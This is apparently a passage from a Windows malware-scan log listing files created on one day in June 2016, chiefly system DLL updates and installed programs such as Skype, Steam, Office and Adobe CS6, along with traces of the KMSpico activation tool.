2016-06-15 18:33 - 2016-06-15 18:33 - 00000000 ____D C:\Program Files (x86)\Sony
2016-06-15 18:32 - 2016-07-13 22:41 - 00000000 __SHD C:\Users\User not found\IntelGraphicsProfiles
2016-06-15 18:32 - 2016-06-21 18:50 - 00000000 ____D C:\Users\User not found\AppData\Roaming\Sony
2016-06-15 18:25 - 2016-06-15 18:25 - 00000000 ____D C:\ProgramData\regid.1986-12.com.adobe
2016-06-15 18:24 - 2016-06-15 18:24 - 00001091 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop CS6 (64 Bit).lnk
2016-06-15 18:24 - 2016-06-15 18:24 - 00001053 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Bridge CS6 (64bit).lnk
2016-06-15 18:24 - 2016-06-15 18:24 - 00000000 ____D C:\Program Files\Adobe
2016-06-15 18:20 - 2016-06-15 18:24 - 00000000 ____D C:\Program Files (x86)\Adobe
2016-06-15 18:20 - 2016-06-15 18:20 - 00001539 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe ExtendScript Toolkit CS6.lnk
2016-06-15 18:20 - 2016-06-15 18:20 - 00001369 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Extension Manager CS6.lnk
2016-06-15 18:18 - 2016-06-15 18:24 - 00000000 ____D C:\Program Files\Common Files\Adobe
2016-06-15 18:16 - 2016-06-15 18:16 - 00000000 ____D C:\Users\User not found\Tracing
2016-06-15 18:14 - 2016-07-13 19:30 - 00000000 ____D C:\Users\User not found\AppData\Roaming\Skype
2016-06-15 18:14 - 2016-07-13 19:29 - 00000000 ___RD C:\Program Files (x86)\Skype
2016-06-15 18:14 - 2016-07-13 19:29 - 00000000 ____D C:\ProgramData\Skype
2016-06-15 18:14 - 2016-06-15 18:14 - 00002723 _____ C:\Users\Public\Desktop\Skype.lnk
2016-06-15 18:14 - 2016-06-15 18:14 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2016-06-15 18:13 - 2016-06-15 18:25 - 00000000 ____D C:\ProgramData\Adobe
2016-06-15 18:13 - 2016-06-15 18:13 - 01463424 _____ (Skype Technologies S.A.) C:\Users\User not found\Downloads\SkypeSetup.exe
2016-06-15 18:13 - 2016-06-15 18:13 - 00000000 ____D C:\Users\User not found\AppData\Roaming\Macromedia
2016-06-15 18:12 - 2016-06-23 19:34 - 00000000 ____D C:\Users\User not found\AppData\Local\Adobe
2016-06-15 18:05 - 2016-06-25 18:18 - 00001760 _____ C:\Users\User not found\Desktop\MPC-HC x64.lnk
2016-06-15 18:05 - 2016-06-15 18:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC-HC x64
2016-06-15 18:05 - 2016-06-15 18:05 - 00000000 ____D C:\Program Files\MPC-HC
2016-06-15 18:04 - 2016-06-15 18:04 - 13395440 _____ (MPC-HC Team ) C:\Users\User not found\Downloads\MPC-HC.1.7.10.x64.exe
2016-06-15 18:02 - 2016-06-15 18:02 - 00004608 _____ C:\Windows\SECOH-QAD.exe
2016-06-15 18:02 - 2016-06-15 18:02 - 00003584 _____ C:\Windows\SECOH-QAD.dll
2016-06-15 18:02 - 2016-06-15 18:02 - 00003382 _____ C:\Windows\System32\Tasks\AutoPico Daily Restart
2016-06-15 18:02 - 2016-06-15 18:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KMSpico
2016-06-15 18:02 - 2016-06-15 18:02 - 00000000 ____D C:\Program Files\KMSpico
2016-06-15 18:02 - 2010-12-06 03:16 - 00090112 _____ (Vestris Inc.) C:\Windows\system32\Vestris.ResourceLib.dll
2016-06-15 17:59 - 2016-06-15 17:59 - 00000000 ____D C:\Users\User not found\AppData\Local\Steam
2016-06-15 17:59 - 2016-06-15 17:59 - 00000000 ____D C:\Users\User not found\AppData\Local\CEF
2016-06-15 17:57 - 2016-06-16 19:41 - 00003192 _____ C:\Windows\System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-2876588207-1483049806-666444280-1002
2016-06-15 17:57 - 2016-06-15 17:57 - 00000000 ___RD C:\Users\User not found\OneDrive
2016-06-15 17:57 - 2016-06-15 17:57 - 00000000 ____D C:\ProgramData\Microsoft OneDrive
2016-06-15 17:55 - 2016-06-15 17:59 - 00000000 ____D C:\Users\User not found\AppData\Roaming\TS3Client
2016-06-15 17:55 - 2016-06-15 17:55 - 00002509 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneDrive para Empresas.lnk
2016-06-15 17:55 - 2016-06-15 17:55 - 00002480 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk
2016-06-15 17:55 - 2016-06-15 17:55 - 00002465 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype para Empresas 2016.lnk
2016-06-15 17:55 - 2016-06-15 17:55 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint 2016.lnk
2016-06-15 17:55 - 2016-06-15 17:55 - 00002444 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook 2016.lnk
2016-06-15 17:55 - 2016-06-15 17:55 - 00002425 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access 2016.lnk
2016-06-15 17:55 - 2016-06-15 17:55 - 00002420 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk
2016-06-15 17:55 - 2016-06-15 17:55 - 00002384 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher 2016.lnk
2016-06-15 17:55 - 2016-06-15 17:55 - 00002366 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk
2016-06-15 17:55 - 2016-06-15 17:55 - 00000979 _____ C:\Users\Public\Desktop\TeamSpeak 3 Client.lnk
2016-06-15 17:55 - 2016-06-15 17:55 - 00000941 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client.lnk
2016-06-15 17:55 - 2016-06-15 17:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Ferramentas do Microsoft Office 2016
2016-06-15 17:55 - 2016-06-15 17:55 - 00000000 ____D C:\Program Files\TeamSpeak 3 Client
2016-06-15 17:54 - 2016-07-04 12:29 - 00000000 ____D C:\Program Files (x86)\Steam
2016-06-15 17:54 - 2016-06-15 17:55 - 31581784 _____ (TeamSpeak Systems GmbH) C:\Users\User not found\Downloads\TeamSpeak3-Client-win64-3.0.19.1.exe
2016-06-15 17:54 - 2016-06-15 17:54 - 01380712 _____ C:\Users\User not found\Downloads\SteamSetup.exe
2016-06-15 17:54 - 2016-06-15 17:54 - 00000975 _____ C:\Users\Public\Desktop\Steam.lnk
2016-06-15 17:54 - 2016-06-15 17:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2016-06-15 17:48 - 2016-06-21 15:04 - 00000000 ____D C:\Program Files (x86)\Microsoft Office
2016-06-15 17:48 - 2016-06-15 17:48 - 00000000 ____D C:\Program Files\Microsoft Office 15
2016-06-15 17:40 - 2016-06-15 17:40 - 00002609 _____ C:\Users\User not found\Downloads\reg-key-winrar-4.20.rar
2016-06-15 17:40 - 2016-06-15 17:40 - 00000000 ____D C:\Users\User not found\AppData\Roaming\WinRAR
2016-06-15 17:39 - 2016-06-15 17:41 - 00000000 ____D C:\Program Files\WinRAR
2016-06-15 17:39 - 2016-06-15 17:39 - 00000000 ____D C:\Users\User not found\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-06-15 17:39 - 2016-06-15 17:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2016-06-15 17:38 - 2016-06-15 17:43 - 2335463398 _____ C:\Users\User not found\Downloads\o16pt.rar
2016-06-15 17:38 - 2016-06-15 17:38 - 01992536 _____ C:\Users\User not found\Downloads\winrar-x64-531.exe
2016-06-15 17:36 - 2016-06-15 17:36 - 00002680 _____ C:\Users\User not found\Desktop\µTorrent.lnk
2016-06-15 17:35 - 2016-07-02 13:51 - 00000000 ____D C:\Users\User not found\AppData\Roaming\uTorrent
2016-06-15 17:34 - 2016-06-15 17:35 - 02530304 _____ (BitTorrent Inc.) C:\Users\User not found\Downloads\uTorrent.exe
2016-06-15 17:11 - 2016-03-31 07:50 - 01307328 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2016-06-15 17:11 - 2016-03-31 04:40 - 00747520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2016-06-15 17:11 - 2016-01-10 18:50 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\cfgbkend.dll
2016-06-15 17:11 - 2016-01-10 18:16 - 00898048 _____ (Microsoft Corporation) C:\Windows\system32\CPFilters.dll
2016-06-15 17:11 - 2016-01-10 18:14 - 00048640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cfgbkend.dll
2016-06-15 17:11 - 2016-01-10 18:12 - 00532480 _____ (Microsoft Corporation) C:\Windows\system32\EncDec.dll
2016-06-15 17:11 - 2016-01-10 17:51 - 00702976 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CPFilters.dll
2016-06-15 17:11 - 2016-01-10 17:49 - 00443392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\EncDec.dll
2016-06-15 17:10 - 2016-05-12 19:38 - 00135336 _____ (Microsoft Corporation) C:\Windows\system32\gpapi.dll
2016-06-15 17:10 - 2016-05-12 18:43 - 00115704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gpapi.dll
2016-06-15 17:10 - 2016-05-12 17:24 - 00678912 _____ (Microsoft Corporation) C:\Windows\system32\gpprefcl.dll
2016-06-15 17:10 - 2016-05-12 17:17 - 00331776 _____ (Microsoft Corporation) C:\Windows\system32\polstore.dll
2016-06-15 17:10 - 2016-05-12 17:12 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\gpscript.dll
2016-06-15 17:10 - 2016-05-12 17:08 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\FwRemoteSvr.dll
2016-06-15 17:10 - 2016-05-12 17:07 - 01360896 _____ (Microsoft Corporation) C:\Windows\system32\gpsvc.dll
2016-06-15 17:10 - 2016-05-12 16:59 - 00398848 _____ (Microsoft Corporation) C:\Windows\system32\IPSECSVC.DLL
2016-06-15 17:10 - 2016-05-12 16:48 - 00580096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gpprefcl.dll
2016-06-15 17:10 - 2016-05-12 16:43 - 00291328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\polstore.dll
2016-06-15 17:10 - 2016-05-12 16:40 - 00034304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gpscript.dll
2016-06-15 17:10 - 2016-05-12 16:37 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FwRemoteSvr.dll
2016-06-15 17:10 - 2015-05-30 22:18 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\werdiagcontroller.dll
2016-06-15 17:10 - 2015-05-30 20:36 - 00230400 _____ (Microsoft Corporation) C:\Windows\system32\AudioEndpointBuilder.dll
2016-06-15 17:10 - 2015-05-30 20:35 - 00911360 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2016-06-15 17:09 - 2016-05-06 16:45 - 00748544 _____ (Microsoft Corporation) C:\Windows\system32\StructuredQuery.dll
2016-06-15 17:09 - 2016-05-06 16:23 - 00503808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\StructuredQuery.dll
2016-06-15 17:09 - 2015-12-02 16:04 - 00670208 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2016-06-15 17:09 - 2015-12-02 16:01 - 00561664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2016-06-15 17:09 - 2015-11-05 09:59 - 00145408 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rmcast.sys
2016-06-15 17:09 - 2015-06-15 23:41 - 00065024 _____ (Microsoft Corporation) C:\Windows\system32\msiexec.exe
2016-06-15 17:09 - 2015-06-15 22:16 - 00059904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msiexec.exe
2016-06-15 17:08 - 2016-04-09 22:58 - 00534016 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.dll
2016-06-15 17:08 - 2016-04-09 22:50 - 00375296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.dll
2016-06-15 17:08 - 2016-04-06 22:13 - 00137976 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2016-06-15 17:08 - 2016-04-06 18:49 - 00120384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2016-06-15 17:08 - 2016-04-06 17:52 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2016-06-15 17:08 - 2016-04-06 16:48 - 00357888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2016-06-15 17:08 - 2016-03-11 15:48 - 00833024 _____ (Microsoft Corporation) C:\Windows\system32\samsrv.dll
2016-06-15 17:08 - 2016-03-10 18:03 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\samlib.dll
2016-06-15 17:08 - 2016-03-10 17:48 - 00064512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\samlib.dll
2016-06-15 17:08 - 2015-12-03 20:42 - 00106960 _____ (Microsoft Corporation) C:\Windows\system32\ncryptsslp.dll
2016-06-15 17:08 - 2015-12-03 19:52 - 00091416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncryptsslp.dll
2016-06-15 17:07 - 2016-05-14 00:09 - 04169216 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-06-15 17:07 - 2016-03-03 02:39 - 01661576 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2016-06-15 17:07 - 2016-03-03 02:39 - 01212248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2016-06-15 17:07 - 2015-12-05 06:58 - 02745184 _____ (Microsoft Corporation) C:\Windows\system32\WMVDECOD.DLL
2016-06-15 17:07 - 2015-12-05 06:58 - 02528784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVDECOD.DLL
2016-06-15 17:07 - 2015-12-05 06:58 - 02450240 _____ (Microsoft Corporation) C:\Windows\system32\WMVENCOD.DLL
2016-06-15 17:07 - 2015-12-05 06:58 - 02447136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVENCOD.DLL
2016-06-15 17:07 - 2015-12-05 06:58 - 02334104 _____ (Microsoft Corporation) C:\Windows\system32\mfcore.dll
2016-06-15 17:07 - 2015-12-05 06:58 - 02324744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfcore.dll
2016-06-15 17:07 - 2015-12-05 06:58 - 01877504 _____ (Microsoft Corporation) C:\Windows\system32\msmpeg2adec.dll
2016-06-15 17:07 - 2015-12-05 06:58 - 01798480 _____ (Microsoft Corporation) C:\Windows\system32\WMALFXGFXDSP.dll
2016-06-15 17:07 - 2015-12-05 06:58 - 01484888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msmpeg2adec.dll
2016-06-15 17:07 - 2015-12-05 06:58 - 01288128 _____ (Microsoft Corporation) C:\Windows\system32\mfnetsrc.dll
2016-06-15 17:07 - 2015-12-05 06:58 - 01210200 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOD.DLL
2016-06-15 17:07 - 2015-12-05 06:58 - 01150232 _____ (Microsoft Corporation) C:\Windows\system32\WMADMOE.DLL
2016-06-15 17:07 - 2015-12-05 06:58 - 01115640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfnetsrc.dll
2016-06-15 17:07 - 2015-12-05 06:58 - 01037680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOD.DLL
2016-06-15 17:07 - 2015-12-05 06:58 - 00914672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMADMOE.DLL
2016-06-15 17:07 - 2015-12-05 06:58 - 00850680 _____ (Microsoft Corporation) C:\Windows\system32\mfnetcore.dll
2016-06-15 17:07 - 2015-12-05 06:58 - 00735496 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2016-06-15 17:07 - 2015-12-05 06:58 - 00700360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfnetcore.dll
2016-06-15 17:07 - 2015-12-05 06:58 - 00629600 _____ (Microsoft Corporation) C:\Windows\system32\MP4SDECD.DLL
2016-06-15 17:07 - 2015-12-05 06:58 - 00584656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2016-06-15 17:07 - 2015-12-05 06:58 - 00557856 _____ (Microsoft Corporation) C:\Windows\system32\WMVSDECD.DLL
2016-06-15 17:07 - 2015-12-05 06:58 - 00498472 _____ (Microsoft Corporation) C:\Windows\system32\mfsvr.dll
2016-06-15 17:07 - 2015-12-05 06:58 - 00492736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSDECD.DLL
2016-06-15 17:07 - 2015-12-05 06:58 - 00463776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP4SDECD.DLL
2016-06-15 17:07 - 2015-12-05 06:58 - 00399776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfsvr.dll
2016-06-15 17:07 - 2015-12-05 06:58 - 00299080 _____ (Microsoft Corporation) C:\Windows\system32\VIDRESZR.DLL
2016-06-15 17:07 - 2015-12-05 06:58 - 00275312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MPG4DECD.DLL
2016-06-15 17:07 - 2015-12-05 06:58 - 00274280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP43DECD.DLL
2016-06-15 17:07 - 2015-12-05 06:58 - 00250520 _____ (Microsoft Corporation) C:\Windows\system32\MPG4DECD.DLL
2016-06-15 17:07 - 2015-12-05 06:58 - 00248432 _____ (Microsoft Corporation) C:\Windows\system32\MP43DECD.DLL
2016-06-15 17:07 - 2015-12-05 06:58 - 00246856 _____ (Microsoft Corporation) C:\Windows\system32\RESAMPLEDMO.DLL
2016-06-15 17:07 - 2015-12-05 06:58 - 00244296 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2016-06-15 17:07 - 2015-12-05 06:58 - 00229272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RESAMPLEDMO.DLL
2016-06-15 17:07 - 2015-12-05 06:58 - 00203016 _____ (Microsoft Corporation) C:\Windows\system32\COLORCNV.DLL
2016-06-15 17:07 - 2015-12-05 06:58 - 00184912 _____ (Microsoft Corporation) C:\Windows\SysWOW64\COLORCNV.DLL
2016-06-15 17:07 - 2015-12-05 06:58 - 00183856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VIDRESZR.DLL
2016-06-15 17:07 - 2015-12-05 06:58 - 00116720 _____ (Microsoft Corporation) C:\Windows\system32\MP3DMOD.DLL
2016-06-15 17:07 - 2015-12-05 06:58 - 00110544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfps.dll
2016-06-15 17:07 - 2015-12-05 06:58 - 00099136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MP3DMOD.DLL
2016-06-15 17:07 - 2015-12-05 06:58 - 00090904 _____ (Microsoft Corporation) C:\Windows\system32\devenum.dll
2016-06-15 17:07 - 2015-12-05 06:58 - 00090392 _____ (Microsoft Corporation) C:\Windows\system32\mfvdsp.dll
2016-06-15 17:07 - 2015-12-05 06:58 - 00081032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\devenum.dll
2016-06-15 17:07 - 2015-12-05 06:58 - 00076936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfvdsp.dll
2016-06-15 17:07 - 2015-12-03 19:07 - 00340992 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2016-06-15 17:07 - 2015-12-03 19:07 - 00289792 _____ (Microsoft Corporation) C:\Windows\system32\ksproxy.ax
2016-06-15 17:07 - 2015-12-03 19:05 - 00644608 _____ (Microsoft Corporation) C:\Windows\system32\WMVXENCD.DLL
2016-06-15 17:07 - 2015-12-03 19:02 - 01664000 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOE.DLL
2016-06-15 17:07 - 2015-12-03 19:00 - 00451072 _____ (Microsoft Corporation) C:\Windows\system32\WMVSENCD.DLL
2016-06-15 17:07 - 2015-12-03 18:58 - 00378880 ____C (Microsoft Corporation) C:\Windows\system32\SysFxUI.dll
2016-06-15 17:07 - 2015-12-03 18:36 - 01697792 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2016-06-15 17:07 - 2015-12-03 18:30 - 00468480 _____ (Microsoft Corporation) C:\Windows\system32\MFWMAAEC.DLL
2016-06-15 17:07 - 2015-12-03 18:28 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2016-06-15 17:07 - 2015-12-03 18:28 - 00245760 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ksproxy.ax
2016-06-15 17:07 - 2015-12-03 18:27 - 00736256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVXENCD.DLL
2016-06-15 17:07 - 2015-12-03 18:24 - 01411584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOE.DLL
2016-06-15 17:07 - 2015-12-03 18:23 - 00402432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMVSENCD.DLL
2016-06-15 17:07 - 2015-12-03 18:06 - 01501184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2016-06-15 17:07 - 2015-12-03 18:01 - 00743936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MFWMAAEC.DLL
2016-06-15 17:07 - 2015-12-03 17:40 - 01010688 _____ (Microsoft Corporation) C:\Windows\system32\WMSPDMOD.DLL
2016-06-15 17:07 - 2015-12-03 17:29 - 00887296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMSPDMOD.DLL
2016-06-15 17:07 - 2015-10-13 18:10 - 00559616 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2016-06-15 17:07 - 2015-10-13 18:10 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tdx.sys
2016-06-15 17:06 - 2016-04-10 05:21 - 01763376 _____ (Microsoft Corporation) C:\Windows\system32\WindowsCodecs.dll
2016-06-15 17:06 - 2016-04-10 05:21 - 01489088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WindowsCodecs.dll
2016-06-15 17:06 - 2016-03-03 17:47 - 02345472 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2016-06-15 17:06 - 2016-03-03 17:33 - 01556992 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2016-06-15 17:06 - 2015-07-16 01:29 - 00101720 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mountmgr.sys
2016-06-15 17:06 - 2015-07-10 18:54 - 01217024 _____ (Microsoft Corporation) C:\Windows\system32\sysmain.dll
2016-06-15 17:06 - 2015-01-30 02:29 - 00035840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\atlthunk.dll
2016-06-15 17:05 - 2016-02-11 15:21 - 00869576 _____ (Microsoft Corporation) C:\Windows\system32\msvcr120_clr0400.dll
2016-06-15 17:05 - 2016-02-11 15:21 - 00678600 _____ (Microsoft Corporation) C:\Windows\system32\msvcp120_clr0400.dll
2016-06-15 17:05 - 2016-02-11 15:20 - 00875720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcr120_clr0400.dll
2016-06-15 17:05 - 2016-02-11 15:20 - 00536776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvcp120_clr0400.dll
2016-06-15 17:05 - 2015-11-21 17:47 - 00522240 _____ (Microsoft Corporation) C:\Windows\system32\catsrvut.dll
2016-06-15 17:05 - 2015-11-21 17:40 - 00414208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\catsrvut.dll
2016-06-15 17:04 - 2016-05-16 22:13 - 00563016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cng.sys
2016-06-15 17:04 - 2016-05-16 22:13 - 00397224 _____ (Microsoft Corporation) C:\Windows\system32\bcryptprimitives.dll
2016-06-15 17:04 - 2016-05-16 22:13 - 00340872 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcryptprimitives.dll
2016-06-15 17:04 - 2016-05-16 22:13 - 00178008 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2016-06-15 17:04 - 2016-05-14 00:07 - 00675328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv2.sys
2016-06-15 17:04 - 2016-05-14 00:07 - 00416768 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srv.sys
2016-06-15 17:04 - 2016-05-14 00:06 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\srvnet.sys
2016-06-15 17:04 - 2016-05-13 23:34 - 00445440 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2016-06-15 17:04 - 2016-05-13 22:58 - 00324096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2016-06-15 17:04 - 2016-05-09 22:35 - 07075328 _____ (Microsoft Corporation) C:\Windows\system32\glcndFilter.dll
2016-06-15 17:04 - 2016-05-09 21:56 - 05270016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\glcndFilter.dll
2016-06-15 17:04 - 2016-05-09 21:45 - 07793152 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Data.Pdf.dll
2016-06-15 17:04 - 2016-05-09 21:23 - 05265920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Data.Pdf.dll
2016-06-15 17:04 - 2016-04-06 19:20 - 00201728 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2016-06-15 17:04 - 2016-04-06 19:19 - 00401920 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2016-06-15 17:04 - 2016-04-06 19:19 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2016-06-15 17:04 - 2016-04-06 17:57 - 01441792 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2016-06-15 17:04 - 2015-09-07 17:22 - 00477184 _____ (Microsoft Corporation) C:\Windows\system32\puiobj.dll
2016-06-15 17:04 - 2015-09-07 17:21 - 00825856 _____ (Microsoft Corporation) C:\Windows\system32\pmcsnap.dll
2016-06-15 17:04 - 2015-09-07 17:17 - 00260096 _____ (Microsoft Corporation) C:\Windows\system32\ppcsnap.dll
2016-06-15 17:04 - 2015-09-07 16:54 - 00367104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\puiobj.dll
2016-06-15 17:04 - 2015-09-07 16:30 - 01091584 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2016-06-15 17:04 - 2015-03-20 04:49 - 00309760 _____ (Microsoft Corporation) C:\Windows\system32\compstui.dll
2016-06-15 17:04 - 2015-01-29 02:04 - 00864256 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2016-06-15 17:03 - 2016-02-11 21:17 - 01737088 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2016-06-15 17:03 - 2016-02-11 21:17 - 01663184 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2016-06-15 17:03 - 2016-02-11 21:17 - 01523208 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2016-06-15 17:03 - 2016-02-11 21:17 - 01490120 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2016-06-15 17:03 - 2016-02-11 21:17 - 01358952 _____ (Microsoft Corporation) C:\Windows\system32\winresume.exe
2016-06-15 17:03 - 2016-02-11 21:16 - 01501488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-06-15 17:03 - 2016-02-09 19:07 - 00246784 _____ (Microsoft Corporation) C:\Windows\system32\microsoft-windows-system-events.dll
2016-06-15 17:03 - 2016-02-03 16:09 - 00086016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\olepro32.dll
2016-06-15 17:03 - 2016-02-03 16:00 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
2016-06-15 17:03 - 2016-02-03 16:00 - 00077824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll
2016-06-15 17:03 - 2015-11-09 01:41 - 01540728 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2016-06-15 17:03 - 2015-11-08 22:23 - 01994752 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2016-06-15 17:03 - 2015-11-08 22:13 - 01383936 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2016-06-15 17:03 - 2015-11-08 22:01 - 01753600 _____ (Microsoft Corporation) C:\Windows\system32\GdiPlus.dll
2016-06-15 17:03 - 2015-11-08 21:52 - 01559552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2016-06-15 17:03 - 2015-11-08 21:48 - 01376256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2016-06-15 17:03 - 2015-11-08 21:42 - 01490944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GdiPlus.dll
2016-06-15 17:03 - 2015-03-23 22:59 - 00360480 _____ (Microsoft Corporation) C:\Windows\system32\sechost.dll
2016-06-15 17:03 - 2015-03-23 22:45 - 00257216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sechost.dll
2016-06-15 17:03 - 2015-03-20 04:17 - 00411648 _____ (Microsoft Corporation) C:\Windows\system32\tracerpt.exe
2016-06-15 17:03 - 2015-03-20 03:41 - 00369152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tracerpt.exe
